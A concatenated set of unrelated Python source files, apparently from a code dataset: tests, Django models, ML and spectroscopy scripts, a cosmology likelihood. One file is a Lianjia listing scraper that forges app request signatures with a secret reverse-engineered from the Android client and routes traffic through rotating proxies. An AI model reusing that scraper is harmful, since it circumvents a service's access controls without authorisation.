        assert msg.message == "Metric some_metric successfully updated."
        # test update metric (set: correct)
        await self.send_update_metric("some_metric", "set")
        envelope = await self.prometheus_con.receive()
        msg = cast(PrometheusMessage, envelope.message)
        assert msg.performative == PrometheusMessage.Performative.RESPONSE
        assert msg.code == 200
        assert msg.message == "Metric some_metric successfully updated."
        # test update metric (doesn't exist)
        await self.send_update_metric("cool_metric", "inc")
        envelope = await self.prometheus_con.receive()
        msg = cast(PrometheusMessage, envelope.message)
        assert msg.performative == PrometheusMessage.Performative.RESPONSE
        assert msg.code == 404
        assert msg.message == "Metric cool_metric not found."
        # test update metric (bad update function: not found in attr)
        await self.send_update_metric("some_metric", "go")
        envelope = await self.prometheus_con.receive()
        msg = cast(PrometheusMessage, envelope.message)
        assert msg.performative == PrometheusMessage.Performative.RESPONSE
        assert msg.code == 400
        assert msg.message == "Update function go not found for metric some_metric."
        # test update metric (bad update function: found in getattr, not a method)
        await self.send_update_metric("some_metric", "name")
        envelope = await self.prometheus_con.receive()
        msg = cast(PrometheusMessage, envelope.message)
        assert msg.performative == PrometheusMessage.Performative.RESPONSE
        assert msg.code == 400
        assert (
            msg.message
            == "Failed to update metric some_metric: name is not a valid update function."
        )
        # Test that invalid message is rejected.
        with pytest.raises(AEAEnforceError):
            envelope = Envelope(
                to="some_address",
                sender="me",
                message=Mock(spec=Message),
            )
            await self.prometheus_con.channel.send(envelope)
        # Test that envelope without dialogue produces warning.
        msg = PrometheusMessage(
            PrometheusMessage.Performative.RESPONSE, code=0, message=""
        )
        envelope = Envelope(
            to=self.prometheus_address,
            sender=self.some_skill,
            message=msg,
        )
        await self.prometheus_con.channel.send(envelope)
        # Test that envelope with invalid protocol_specification_id raises error.
        with pytest.raises(ValueError):
            msg, _ = self.dialogues.create(
                counterparty=self.prometheus_address,
                performative=PrometheusMessage.Performative.UPDATE_METRIC,
                title="",
                callable="",
                value=1.0,
                labels={},
            )
            envelope = Envelope(
                to=self.prometheus_address,
                sender=self.some_skill,
                message=msg,
            )
            # forcibly corrupt the id to hit the validation path
            envelope._protocol_specification_id = "bad_id"
            await self.prometheus_con.channel.send(envelope)

    @pytest.mark.asyncio
    async def test_disconnect(self):
        """Test disconnect."""
        await self.prometheus_con.disconnect()
        assert (
            self.prometheus_con.state == ConnectionStates.disconnected
        ), "should be disconnected"
|
995,008 | 8ec4882d2ff2a65c6d1d492a7e2838b915805ec0 | from flask import Flask
def create_app():
    """Build the Flask application: load settings, then wire up the blueprints."""
    application = Flask(__name__)
    application.config.from_object("api.setting")
    register_blueprint(application)
    return application
def register_blueprint(app):
    """Register the site's `web` blueprint on *app*.

    The import is deliberately local -- presumably to avoid a circular import
    at module load time; confirm against api.web.
    """
    from api.web import web
    app.register_blueprint(web)
995,009 | f11901bc4966fa99dc9ee9db08798b77b861bb4b | from django.db import models
from django.utils import timezone
from datetime import timedelta
from django.contrib.auth.models import AbstractUser
import os
# Create your models here.
class UserProfile(AbstractUser):
    """Site user; extends Django's AbstractUser with profile fields."""
    gender = models.CharField(max_length=6, choices=(("male",u"male"),("female",u"female"),("secret", u"secret")), default="secret")
    # NOTE(review): AbstractUser already defines `email`; this override makes it nullable.
    email = models.EmailField(null=True, blank=True)
    remarks = models.CharField(max_length=500, null=True, blank=True)
    address = models.CharField(max_length=100, default=u"")

    class Meta(AbstractUser.Meta):
        pass

    def __str__(self):
        return (self.username)
class Message(models.Model):
    """Private message from one user (author) to another (receiver)."""
    author = models.ForeignKey('UserProfile', related_name='Message_Author', on_delete=models.CASCADE)
    receiver = models.ForeignKey('UserProfile', related_name='Message_Receiver', on_delete=models.CASCADE)
    content = models.CharField(max_length=500, null=True, blank=True)
    time = models.DateTimeField(default=timezone.now)
    # Free-text read marker, 'UNREAD' by default (presumably flipped elsewhere
    # when the message is read -- confirm).  'UNREAD' is exactly max_length.
    readflag = models.CharField(max_length=6, default='UNREAD')
    remarks = models.CharField(max_length=500, null=True, blank=True)

    def __str__(self):
        return ('from %s to %s at %s:%s %s/%s/%s'
                % (self.author, self.receiver, self.time.hour, self.time.minute, self.time.day, self.time.month,
                   self.time.year))
class Topic(models.Model):
    """Forum topic with simple remark/view counters."""
    title = models.CharField(max_length=100, null=True, blank=True)
    content = models.CharField(max_length=500, null=True, blank=True)
    time = models.DateTimeField(default=timezone.now)
    author = models.ForeignKey('UserProfile', related_name='Topic_Author', on_delete=models.CASCADE, null=True,
                               blank=True)
    remarks = models.PositiveIntegerField(default=0)
    views = models.PositiveIntegerField(default=0)

    def __str__(self):
        return self.content

    def increase_remarks(self):
        """Bump the remark counter, persisting only that column."""
        self.remarks += 1
        self.save(update_fields=['remarks'])

    def increase_views(self):
        """Bump the view counter, persisting only that column."""
        self.views += 1
        self.save(update_fields=['views'])
class Topiccomment(models.Model):
    """Comment attached to a Topic."""
    topic = models.ForeignKey('Topic', on_delete=models.CASCADE, null=True,
                              blank=True)
    # comment = models.ForeignKey('self', on_delete=models.CASCADE, null=True,
    #                             blank=True)
    content = models.CharField(max_length=500, null=True, blank=True)
    time = models.DateTimeField(default=timezone.now)
    author = models.ForeignKey('UserProfile', related_name='TopicComment_Author', on_delete=models.CASCADE, null=True,
                               blank=True)
    # remarks = models.CharField(max_length=500, null=True, blank=True)

    def __str__(self):
        return self.content
class News(models.Model):
    """News article.  The author is stored as plain text, not a user FK."""
    title = models.CharField(max_length=100, null=True, blank=True)
    content = models.CharField(max_length=10000, null=True, blank=True)
    time = models.DateTimeField(default=timezone.now)
    author = models.CharField(max_length=100, null=True, blank=True)
    description = models.CharField(max_length=100, null=True, blank=True)
    remarks = models.CharField(max_length=500, null=True, blank=True)
class NewsComment(models.Model):
    """Comment attached to a News article (note: the FK field is named `topic`)."""
    topic = models.ForeignKey('News', on_delete=models.CASCADE, null=True,
                              blank=True)
    content = models.CharField(max_length=500, null=True, blank=True)
    time = models.DateTimeField(default=timezone.now)
    author = models.ForeignKey('UserProfile', related_name='NewsComment_Author', on_delete=models.CASCADE, null=True, blank=True)
class Photo(models.Model):
    """User-uploaded album photo with a thumbs-up counter."""
    photographer = models.ForeignKey('UserProfile', related_name='Photo_Author',
                                     on_delete=models.CASCADE, null=True, blank=True)
    image = models.ImageField(upload_to='images/album/', blank=True, null=True)
    thumbs_up_number = models.IntegerField(null=False, blank=True, default=0)
    # NOTE(review): choice keys are "1"/"2" but the default is the display value
    # "Landscape" -- the default is not a valid choice and will fail validation;
    # confirm intent (likely should be default="1").
    category = models.CharField(max_length=20, null=True, blank=True, default="Landscape",
                                choices=(("1", u"Landscape"), ("2", u"Portraiture")))
    time = models.DateTimeField(default=timezone.now)
    photo_name = models.CharField(max_length=50, null=True, blank=True)
    photographer_name = models.CharField(max_length=50, null=True, blank=True)
    photographer_remark = models.CharField(max_length=500, null=True, blank=True)

    # Python 2 era method; Python 3 uses __str__ below.
    def __unicode__(self):
        return '%s %s' % (self.photo_name, self.image)

    def increase_thumbs_up(self):
        """Bump the thumbs-up counter, persisting only that column."""
        self.thumbs_up_number += 1
        self.save(update_fields=['thumbs_up_number'])

    def __str__(self):
        return self.photo_name
class PhotoComment(models.Model):
    """Comment attached to a Photo."""
    author = models.ForeignKey('UserProfile', related_name='PhotoComment_Author',
                               on_delete=models.CASCADE, null=True)
    photo = models.ForeignKey('Photo', related_name='PhotoID',
                              on_delete=models.CASCADE, null=True)
    time = models.DateTimeField(default=timezone.now)
    content = models.CharField(max_length=500, null=True, blank=True)

    # Python 2 era method; Python 3 uses __str__ below.
    def __unicode__(self):
        return '%s %s' % (self.photo, self.content)

    def __str__(self):
        return self.content
995,010 | 1f5945c5f017f13695fc81e0c3adfda810db3750 | import numpy as np
from collections import deque
import random
from ActorCritic_network.actor_network import ActorNetwork
from ActorCritic_network.critic_network import CriticNetwork
# Replay-buffer and training hyper-parameters.
REPLAY_MEMORY_SIZE = 300000  # play result = state of trade_board + selected action + reward + sign-off state
BATCH_SIZE = 256  # transitions per training minibatch
GAMMA = 0.999  # discount factor for bootstrapped future value
is_grad_inverter = False  # NOTE(review): not referenced anywhere in this file -- confirm before removing
class DDPG:
    """Deep Deterministic Policy Gradient trainer.

    Holds an actor/critic pair (each with a target network), a FIFO replay
    buffer, and the minibatch update step (`train`).
    """

    def __init__(self, session, currency, chart, timeline, length):
        # Dimensions of the (currency * chart) stack of (timeline, length) inputs.
        self.currency = currency
        self.chart = chart
        self.timeline = timeline
        self.length = length
        # One continuous action component per currency.
        self.num_action = currency
        self.critic_net = CriticNetwork(session, currency, chart, timeline, length)
        self.actor_net = ActorNetwork(session, currency, chart, timeline, length)
        # initialize buffer network:
        self.replay_memory = deque()
        # initialize time step:
        self.time_step = 0
        self.counter = 0  # NOTE(review): never read in this file -- confirm it is needed
        # NOTE(review): appears unused; looks like per-component action bounds [-1, 1].
        action_boundary = [[-1, 1]] * currency

    def evaluate_actor(self, state_t):
        """Return the (online) actor network's action for *state_t*."""
        return self.actor_net.evaluate_actor(state_t)

    def add_experience(self, state, next_state, action, reward, terminal):
        """Store one transition, reshaping states to the networks' 4-D input layout."""
        self.state = np.reshape(state, (self.currency * self.chart, self.timeline, self.length, 1))
        self.next_state = np.reshape(next_state, (self.currency * self.chart, self.timeline, self.length, 1))
        self.action = action
        self.reward = reward
        self.terminal = terminal
        self.replay_memory.append((self.state, self.next_state, self.action, self.reward, self.terminal))
        self.time_step = self.time_step + 1
        # Drop the oldest transition once the buffer is full.
        if len(self.replay_memory) > REPLAY_MEMORY_SIZE:
            self.replay_memory.popleft()

    def minibatches(self):
        """Sample BATCH_SIZE transitions and split them into per-field arrays on self."""
        batch = random.sample(self.replay_memory, BATCH_SIZE)
        # state t
        self.state_t_batch = [item[0] for item in batch]
        self.state_t_batch = np.array(self.state_t_batch)
        #self.state_t_batch = np.reshape(self.state_t_batch, (self.currency * self.chart, self.timeline, self.length, 1))
        # state t+1
        self.state_t_1_batch = [item[1] for item in batch]
        self.state_t_1_batch = np.array(self.state_t_1_batch)
        #self.state_t_1_batch = np.reshape(self.state_t_1_batch, (self.currency * self.chart, self.timeline, self.length, 1))
        self.action_batch = [item[2] for item in batch]
        self.action_batch = np.array(self.action_batch)
        self.action_batch = np.reshape(self.action_batch, [len(self.action_batch), self.num_action])  # how define action_space?
        self.reward_batch = [item[3] for item in batch]
        self.reward_batch = np.array(self.reward_batch)
        self.terminal_batch = [item[4] for item in batch]
        self.terminal_batch = np.array(self.terminal_batch)

    def train(self):
        """One DDPG update: critic towards the TD target, actor along dQ/da, then targets."""
        # sample a random minibatch of N transitions from R
        self.minibatches()
        self.action_t_1_batch = self.actor_net.evaluate_target_actor(self.state_t_1_batch)
        # Q'(s_(i+1), a_(i+1))
        q_t_1 = self.critic_net.evaluate_target_critic(self.state_t_1_batch, self.action_t_1_batch)
        self.y_i_batch = []
        for idx in range(BATCH_SIZE):
            if self.terminal_batch[idx]:
                # Terminal transition: no bootstrapped future value.
                self.y_i_batch.append(self.reward_batch[idx])
            else:
                self.y_i_batch.append(self.reward_batch[idx] + GAMMA * q_t_1[idx][0])
        self.y_i_batch = np.array(self.y_i_batch)
        self.y_i_batch = np.reshape(self.y_i_batch, [len(self.y_i_batch), 1])
        # update critic by minimizing the loss
        self.critic_net.train_critic(self.state_t_batch, self.action_batch, self.y_i_batch)
        # update actor proportional to the gradients
        action_for_deltaQ = self.evaluate_actor(self.state_t_batch)
        self.deltaQ_a = self.critic_net.compute_deltaQ_a(self.state_t_batch, action_for_deltaQ)[0]
        # train actor network proportional to deltaQ/delta_a and delta_actor_model/delta_actor_parameters:
        self.actor_net.train_actor(self.state_t_batch, self.deltaQ_a)
        # update target critic and actor network
        self.critic_net.update_target_critic()
        self.actor_net.update_target_actor()
|
995,011 | beba2e17ae94c52dde16da9678166fa14b59740b | import pickle
# Machine-specific root of the cached attribute pickles; the commented line is
# the author's alternative (macOS) path.
#direct = '/Users/heine2307/Documents/Universitet/UiO/Master/GitHub/VQE/quantum_algorithms/attributes/'
direct = '/home/heineaabo/Documents/UiO/Master/VQE/quantum_algorithms/attributes/'
#def QuantumComputer(device,noise_model,coupling_map,basis_gates=False):
# name = device
# if device == None:
# return None,None,None
# else:
# if noise_model:
# noise_model = pickle.load(open(direct+'noise_models/'+device+'.pkl','rb'))
# if coupling_map:
# coupling_map = pickle.load(open(direct+'coupling_maps/'+device+'.pkl','rb'))
# if basis_gates:
# basis_gates = pickle.load(open(direct+'basis_gates/'+device+'.pkl','rb'))
# return noise_model,coupling_map,basis_gates
class QuantumComputer:
    """Bundle of cached device attributes for a named quantum backend.

    Loads the pickled noise model, coupling map and basis gates that an
    earlier run cached under the module-level `direct` path.
    """

    def __init__(self, name):
        self.name = name
        # Use context managers so each pickle file is closed deterministically
        # (the original passed open(...) straight to pickle.load and leaked
        # three file handles per instance).
        with open(direct + 'noise_models/' + name + '.pkl', 'rb') as fh:
            self.noise_model = pickle.load(fh)
        with open(direct + 'coupling_maps/' + name + '.pkl', 'rb') as fh:
            self.coupling_map = pickle.load(fh)
        with open(direct + 'basis_gates/' + name + '.pkl', 'rb') as fh:
            self.basis_gates = pickle.load(fh)
|
995,012 | 83b594f4c36e9613d1be819bb0b36f36be3341c9 | from FTIR_show import getdata
from FTIR_Pretreatment import mean_centralization,standardlize,sg,msc,snv,D1,D2
from sklearn.decomposition import PCA
from statsmodels.stats.outliers_influence import variance_inflation_factor
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import Lasso,LassoCV,LassoLarsCV
from sklearn.manifold import TSNE
from mpl_toolkits.mplot3d import Axes3D
from sklearn.preprocessing import MinMaxScaler
import matplotlib.pyplot as plt
from sklearn import svm
import sklearn
import numpy as np
import pandas as pd
# Console display tweaks for inspecting large arrays.
np.set_printoptions(threshold=10000)  # elements shown before numpy summarises
np.set_printoptions(linewidth=100)  # characters per printed line
# #######Read in data
# DATA_2B_dir = 'D://正常细胞与癌细胞分类//光谱法//实验数据//FTIR//FTIR总数据//2B//'
# DATA_A549_dir = 'D://正常细胞与癌细胞分类//光谱法//实验数据//FTIR//FTIR总数据//A549//'
# DATA_2B = getdata(DATA_2B_dir)
# DATA_A549 = getdata(DATA_A549_dir)
# #Merge into a data set
# FTIR_DATA = pd.merge(DATA_2B,DATA_A549,on='wave')
# FTIR_DATA = FTIR_DATA.T
# #Create label, 0 means 2B, 1 means A549
# Label = [0 for i in range(DATA_2B.shape[1]-1)] + [1 for i in range(DATA_A549.shape[1]-1)]
# Label = np.array(Label)
# # print(len(Label))
#######sg+msc+snv
# st_absorb = standardlize(absorb)
# D2_absorb = D2(st_absorb)
########dimention reduce
def dim_pca(absorb):
    """Project the spectra in *absorb* onto their first three principal components."""
    pca = PCA(n_components=3)
    absorb_pca = pca.fit_transform(absorb)
    return absorb_pca
def dim_tsne(absorb):
    '''
    Embed the raw spectra into 3 dimensions with t-SNE (PCA initialisation,
    perplexity 30, 5000 iterations) and return the embedded data.
    '''
    tsne = TSNE(perplexity=30, n_components=3, init='pca', n_iter=5000, learning_rate=500)
    absorb_tsne = tsne.fit_transform(absorb)
    return absorb_tsne
def vif(x, thres=10.0):
    '''
    Compute the variance inflation factor (VIF) of every column of *x* and
    return only the columns whose VIF is <= *thres*.

    NOTE(review): despite the original comment about "each round of the loop",
    only a single pass is performed -- VIFs are not recomputed after deletion.
    '''
    # NOTE(review): np.matrix is deprecated in favour of plain 2-D arrays.
    X_m = np.matrix(x)
    # VIF of column i regressed on all other columns.
    VIF_list = [variance_inflation_factor(X_m, i) for i in range(X_m.shape[1])]
    maxvif = pd.DataFrame(VIF_list, index=x.columns, columns=["vif"])
    col_save = list(maxvif[maxvif.vif <= float(thres)].index)
    col_delete = list(maxvif[maxvif.vif > float(thres)].index)
    print(len(col_delete))
    print(maxvif)
    print('delete Variables:', col_delete)
    return x[col_save]
def rmse_cv(model, X=None, y=None):
    """Return the 10-fold cross-validated RMSE of *model* as an array (one per fold).

    X and y default to the module-level `train_data` / `train_label` for
    backward compatibility, but callers should pass them explicitly: the
    original raised NameError unless those globals happened to exist.
    """
    if X is None:
        X = train_data
    if y is None:
        y = train_label
    rmse = np.sqrt(-cross_val_score(model, X, y, scoring="neg_mean_squared_error", cv=10))
    return rmse
def Lasso_select(wave_name, absorb, Label, save_dir):
    '''
    Select wavelengths by Lasso: fit a cross-validated Lasso on the spectra,
    save a bar chart of the non-zero coefficients under *save_dir*, and return
    the indices of the wavelengths whose coefficient is non-zero.
    '''
    ############ lasso
    # Figure output directory (example path kept for reference).
    # save_dir = 'D://正常细胞与癌细胞分类//光谱法//实验数据//FTIR//FTIR总数据//预处理测试结果//'
    # Train/test split (90/10, fixed seed).
    train_data, test_data, train_label, test_label = sklearn.model_selection.train_test_split(absorb, Label, random_state=1, train_size=0.9, test_size=0.1)
    # Optionally rescale the features to (-1, 1).
    # min_max_scaler = MinMaxScaler(feature_range=(-1, 1))
    # train_data = min_max_scaler.fit_transform(train_data)
    # test_data = min_max_scaler.transform(test_data)
    # LassoCV picks the best alpha from the candidates by 10-fold cross-validation.
    model_lasso = LassoCV(alphas=[1, 0.1, 0.01, 0.001, 0.0005], cv=10).fit(train_data, train_label)
    # Best regularisation strength chosen by the model.
    print(model_lasso.alpha_)
    # Per-feature weights; a zero weight means the feature was dropped.
    # print(model_lasso.coef_)
    # Report how many features were kept vs. eliminated.
    coef = pd.Series(model_lasso.coef_, index=train_data.columns)
    print("Lasso picked " + str(sum(coef != 0)) + " variables and eliminated the other " + str(sum(coef == 0)) + " variables")
    # Mean cross-validated RMSE at the chosen alpha (10 folds, hence the mean).
    # print(rmse_cv(model_lasso).mean())
    # Collect the selected variables and their weights for the bar chart.
    Lasso_picked_var = []
    var_coef = []
    for index, value in coef.items():
        if value != 0:
            Lasso_picked_var.append(index)
            var_coef.append(value)
    # Wavelength labels (derivation kept for reference).
    # wave_name = np.array(FTIR_DATA.iloc[0,:])
    # wave_name = np.array(list(map(lambda x: "%.4f" % x , wave_name)))
    plt.figure(dpi=300)
    # Allow minus signs and CJK glyphs in the rendered figure.
    plt.rcParams['axes.unicode_minus'] = False
    plt.rcParams['font.sans-serif'] = ['SimHei']
    plt.bar(wave_name[Lasso_picked_var], var_coef)
    plt.tick_params(labelsize=4)
    plt.title("Coefficients in the Lasso Model")
    plt.savefig(save_dir + 'Lasso_var' + '.jpg')
    plt.show()
    # Distribution of the selected wavelengths over a sample spectrum (disabled).
    # plt.figure()
    # plt.plot(wave_name,absorb.iloc[0, :])
    # plt.scatter(wave_name[Lasso_picked_var], absorb.loc[0, Lasso_picked_var], marker='s', color='r')
    # plt.title('Lasso')
    # plt.legend(['First calibration object', 'Selected variables'])
    # plt.xlabel('Variable index')
    # plt.grid(True)
    # plt.savefig(save_dir + 'Lasso_1'+'.jpg')
    # plt.show()
    # Print the wavelengths with non-zero coefficients.
    print(wave_name[Lasso_picked_var])
    return Lasso_picked_var
# absorb = FTIR_DATA.iloc[1:]
# result = Lasso_select(FTIR_DATA,absorb,Label)
# print(result)
########PCA
# candidate_components = range(1, 30, 1)
# explained_ratios = []
# for c in candidate_components:
# pca = PCA(n_components=c)
# X_pca = pca.fit_transform(st_absorb)
# explained_ratios.append(np.sum(pca.explained_variance_ratio_))
# plt.figure(figsize=(10, 6), dpi=144)
# plt.grid()
# plt.plot(candidate_components, explained_ratios)
# plt.xlabel('Number of PCA Components')
# plt.ylabel('Explained Variance Ratio')
# plt.title('Explained variance ratio for PCA')
# plt.yticks(np.arange(0.5, 1.05, .05))
# plt.xticks(np.arange(0, 30, 1))
# plt.show()
# scatter
# absorb_tsne = dim_tsne(absorb)
# fig = plt.figure()
# ax = Axes3D(fig)
# ax.scatter(absorb_tsne[:,0], absorb_tsne[:,1], absorb_tsne[:,2])
# plt.show()
# plt.figure()
# plt.scatter(absorb_tsne[:,0],absorb_tsne[:,1])
# plt.show() |
995,013 | 467d1211af0f6f1bb878156cb48cec3ad5271d79 | # -*- coding: utf-8 -*-
import time
import base64
import hashlib
import json
import sys
import os
# Make the project root (three levels above the entry script) importable.
sys.path.append(os.path.abspath(os.path.join(sys.argv[0], "../../..")))
from spider.generate_excle import generate_excle
from zaishou_data_analysis import zaishou_data_analysis
from zaishou_constant import zaishou_constant
from spider.AgentAndProxies import GetIpProxy
class zaishou:
    """Crawler for Lianjia's currently-for-sale ("zaishou") listings.

    Talks to the Lianjia mobile API, signing each request the way the Android
    app does (SHA-1 over the canonical query string, base64-wrapped), and
    writes the scraped listings into an Excel workbook.

    NOTE(review): this module is Python 2 (print statements below).
    """

    def __init__(self):
        # Number of result pages to crawl.
        self.count = 21
        # Listings per page.
        self.limit_count = 100
        # Paging offset (page index * page size); starts one page "before" 0
        # because request_url_list() increments it before each request.
        self.limit_offset = -100
        # Unix timestamp of the current request.
        self.request_ts = 0
        # Current page index, starting from 0.
        self.current_page = 0
        # Signing secret reverse-engineered from the Lianjia Android JNI code.
        # self.Authorization = '93273ef46a0b880faf4466c48f74878fcity_id=110000limit_count=10limit_offset=0request_ts=1511232061'
        # The online API only requires the Authorization header.
        self.headers = {
            # 'Page-Schema': 'tradedSearch%2Flist',
            # 'Referer': 'homepage%3F',
            # 'Cookie': 'lianjia_udid=6fc5da9bec827948;lianjia_token=2.007d00a43c04bd8bd26cad8d0d82a4302c;lianjia_ssid=a3c137a9-c77c-438a-a6c0-27c160707d7c;lianjia_uuid=39d20bd7-28a5-4ffa-bbac-dd70d6eaf2cd',
            # 'Lianjia-Access-Token': '2.007d00a43c04bd8bd26cad8d0d82a4302c',
            # 'User-Agent': 'HomeLink8.2.1;generic Custom+Phone+-+5.0.0+-+API+21+-+768x1280; Android 5.0',
            # 'Lianjia-Channel': 'Android_Anzhi',
            # 'Lianjia-Device-Id': '6fc5da9bec827948',
            # 'Lianjia-Version': '8.2.1',
            'Authorization': '93273ef46a0b880faf4466c48f74878fcity_id=110000limit_count=10limit_offset=0request_ts=1511232061',
            # 'Lianjia-Im-Version': '2.4.4',
            # 'Host': 'app.api.lianjia.com',
            # 'Connection': 'Keep-Alive',
            # 'Accept-Encoding': 'gzip'
        }
        self.zaishou_data_analysis = zaishou_data_analysis()
        self.GetIpProxy = GetIpProxy()

    def start(self):
        """Crawl every page, then save the workbook."""
        self.excle_init_title()
        for i in range(self.count):
            self.current_page = i
            # time.sleep(1)
            self.request_url_list()
        # Persist the workbook once all pages have been processed.
        self.generate_excle.saveExcle('zaishou.xls')

    def request_url_list(self):
        """Fetch one page of the listing search and process every hit."""
        self.limit_offset = self.limit_offset + self.limit_count
        self.request_ts = int(time.time())
        # NOTE(review): this first signature string is immediately overwritten
        # by the longer form below -- dead code kept for reference.
        source_Authorization = '93273ef46a0b880faf4466c48f74878fcity_id=110000limit_count=' + str(
            self.limit_count) + 'limit_offset=' + str(self.limit_offset) + 'request_ts=' + str(self.request_ts)
        source_Authorization = '93273ef46a0b880faf4466c48f74878fareaRequest=city_id=110000communityRequset=' \
            'comunityIdRequest=condition=has_recommend=1isFromMap=falseis_history=0is_suggestion=0limit_count=' + str(
            self.limit_count) + 'limit_offset=' + str(self.limit_offset) + 'moreRequest=priceRequest=request_ts=' + str(
            self.request_ts) + 'roomRequest=schoolRequest=sugQueryStr='
        # print source_Authorization
        self.generate_authorization(source_Authorization)
        url = 'https://app.api.lianjia.com/house/ershoufang/searchv4?city_id=110000&priceRequest=&limit_offset=' + str(
            self.limit_offset) + '&moreRequest=&communityRequset=&has_recommend=1&is_suggestion=0&limit_count=' + str(
            self.limit_count) + '&sugQueryStr=&comunityIdRequest=&areaRequest=&' \
            'is_history=0&schoolRequest=&condition=&roomRequest=&isFromMap=false&request_ts=' + str(
            self.request_ts)
        # print headers.get('Authorization')
        print(url)
        try:
            self.get_result_json_list(url)
        except Exception as e:
            # Best effort: a failed page is skipped instead of aborting the crawl.
            pass

    def get_result_json_list(self, url):
        """Fetch the search page, then detail + extended info for each listing."""
        # Proxy-based request (direct requests.get kept commented for reference).
        # result_list = requests.get(url, headers=self.headers)
        result_list = self.GetIpProxy.requestUrlForRe(url, self.headers)
        # print result_list.text
        jsonsource = json.loads(result_list.text, encoding='utf-8')
        if jsonsource["data"]['list'] is not None:
            for index in range(len(jsonsource["data"]['list'])):
                # print jsonsource["data"]['list']
                self.request_ts = int(time.time())
                zaishou_pruduct_url_authorization = '93273ef46a0b880faf4466c48f74878fagent_type=1house_code=' + str(
                    jsonsource["data"]['list'][index]['house_code']) + 'request_ts=' + str(self.request_ts)
                # Build the signed Authorization header for the detail request.
                self.generate_authorization(zaishou_pruduct_url_authorization)
                zaishou_pruduct_url = 'https://app.api.lianjia.com/house/ershoufang/detailpart1?house_code=' + str(
                    jsonsource["data"]['list'][index]['house_code']) + '&agent_type=1&request_ts=' + str(
                    self.request_ts)
                # Proxy-based request.
                # result_product = requests.get(zaishou_pruduct_url, headers=self.headers)
                result_product = self.GetIpProxy.requestUrlForRe(zaishou_pruduct_url, self.headers)
                # print result_product.text
                product_json = json.loads(result_product.text, encoding='utf-8')
                self.zaishou_data_analysis.zaishou_product(product_json['data'])
                # Fetch the extended "more info" block for the same listing.
                self.request_ts = int(time.time())
                zaishou_pruduct_more_authorization = '93273ef46a0b880faf4466c48f74878fhouse_code=' + str(
                    jsonsource["data"]['list'][index]['house_code']) + 'request_ts=' + str(self.request_ts)
                # Build the signed Authorization header for the more-info request.
                self.generate_authorization(zaishou_pruduct_more_authorization)
                zaishou_product_more_url = 'https://app.api.lianjia.com/house/house/moreinfo?house_code=' + str(
                    jsonsource["data"]['list'][index]['house_code']) + '&request_ts=' + str(self.request_ts)
                # Proxy-based request.
                # result_product_more = requests.get(chengjiao_more_url, headers=self.headers)
                result_product_more = self.GetIpProxy.requestUrlForRe(zaishou_product_more_url, self.headers)
                product_json_more = json.loads(result_product_more.text, encoding='utf-8')
                # Worksheet row for this listing.
                # NOTE(review): the extra +10 offset for pages > 0 is unexplained -- confirm.
                if self.current_page == 0:
                    row = index + self.current_page * self.limit_count
                else:
                    row = index + self.current_page * self.limit_count + 10
                print 'row:' + str(row) + ' url:' + zaishou_pruduct_url
                self.zaishou_data_analysis.zaishou_product_moire(product_json_more, row, self.generate_excle)
                # print result_product_more.text

    def generate_authorization(self, str):
        """Sign the canonical query string and store it in self.headers.

        NOTE(review): the parameter shadows the builtin `str`; harmless here
        because the builtin is never needed inside, but worth renaming.
        """
        sha1 = hashlib.sha1(str).hexdigest()
        temp = '20170324_android:' + sha1
        Authorization = base64.b64encode(temp)
        self.headers['Authorization'] = Authorization

    def excle_init_title(self):
        """Create the worksheet and write the header row from the constants table."""
        self.generate_excle = generate_excle()
        self.generate_excle.addSheetExcle('zaishou')
        self.zaishou_constant = zaishou_constant();
        for itemKey in self.zaishou_constant.zaishou_source_data.keys():
            self.generate_excle.writeExclePositon(0, self.zaishou_constant.zaishou_source_data.get(itemKey),
                                                  itemKey)
# Script entry: instantiate the crawler (this rebinds the class name with the
# instance) and run the full crawl.
zaishou = zaishou()
zaishou.start()
|
995,014 | 429d89ba407bfbecea3efcf975fd3ff359d030dd | # this file, along with actpols2_like_py.data, allows you
# to use this likelihood for Monte Python.
#
import os
import numpy as np
from montepython.likelihood_class import Likelihood
import pyactlike # our likelihood
class ACTPol_lite_DR4(Likelihood):
    """MontePython wrapper around the ACTPol DR4 lite likelihood (pyactlike)."""

    # initialization routine
    def __init__(self, path, data, command_line):
        """Register the CLASS output requirements and load the ACT data once."""
        Likelihood.__init__(self, path, data, command_line)
        # Lensed temperature/polarisation spectra up to ell = 6000.
        self.need_cosmo_arguments(
            data,
            {
                "lensing": "yes",
                "output": "tCl lCl pCl",
                "l_max_scalars": 6000,
                "modes": "s",
            },
        )
        self.need_update = True
        # yp2 is the nuisance parameter sampled alongside the cosmology
        # (presumably pyactlike's polarisation efficiency yp -- confirm).
        self.use_nuisance = ["yp2"]
        self.nuisance = ["yp2"]
        self.act = pyactlike.ACTPowerSpectrumData()
        # \ell values 2, 3, ... 6000
        self.xx = np.array(range(2, 6001))

    # compute likelihood
    def loglkl(self, cosmo, data):
        """Return the ACT log-likelihood for the current point; -inf on any failure."""
        lkl = 0.0
        try:
            # call CLASS
            cl = self.get_cl(cosmo, 6000)
            # we follow the convention of operating with (l(l+1)/2pi) * C_l
            ee = cl["ee"][2:]
            te = cl["te"][2:]
            tt = cl["tt"][2:]
            tt = (self.xx) * (self.xx + 1) * tt / (2 * np.pi)
            te = (self.xx) * (self.xx + 1) * te / (2 * np.pi)
            ee = (self.xx) * (self.xx + 1) * ee / (2 * np.pi)
            yp = data.mcmc_parameters["yp2"]["current"]
            lkl = self.act.loglike(tt, te, ee, yp)
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # still propagate; any failure in CLASS or the likelihood maps the
            # point to zero probability.
            lkl = -np.inf
        return lkl
|
995,015 | 713952565b8722cc7e730cb2c195b4df7400df33 | import pandas as pd
import numpy as np
import sys
import os
# Dataset directory comes from the CLI: python <script> <directory>.
directory = sys.argv[1]

# Join the raw dataset with its classifications on SMILES and persist the merge.
df = pd.read_csv('./{}/dataset_{}.csv'.format(directory, directory), sep=';')
classifications = pd.read_csv('./{}/classifications.csv'.format(directory), sep=';')
df = pd.merge(df, classifications, on='SMILES')
df.to_csv('./{}/data_classified.csv'.format(directory), sep=';', index=False)
# Drop rows without a SMILES and de-duplicate on SMILES.
df2 = df[df['SMILES'].notna()]
df3 = df2.drop_duplicates('SMILES')
#print(df3)

#---------------- CSS Base ---------------
# CCSbase input: Adduct fixed to 'All', SMILES doubles as the Name column.
adduct = np.repeat('All', df3.shape[0])
data_ccsbase = np.column_stack((adduct, df3.SMILES, df3.SMILES))
column_values_ccsbase = ['Adduct', 'Smiles', 'Name']
ccsbase = pd.DataFrame(data=data_ccsbase,
                       columns=column_values_ccsbase)
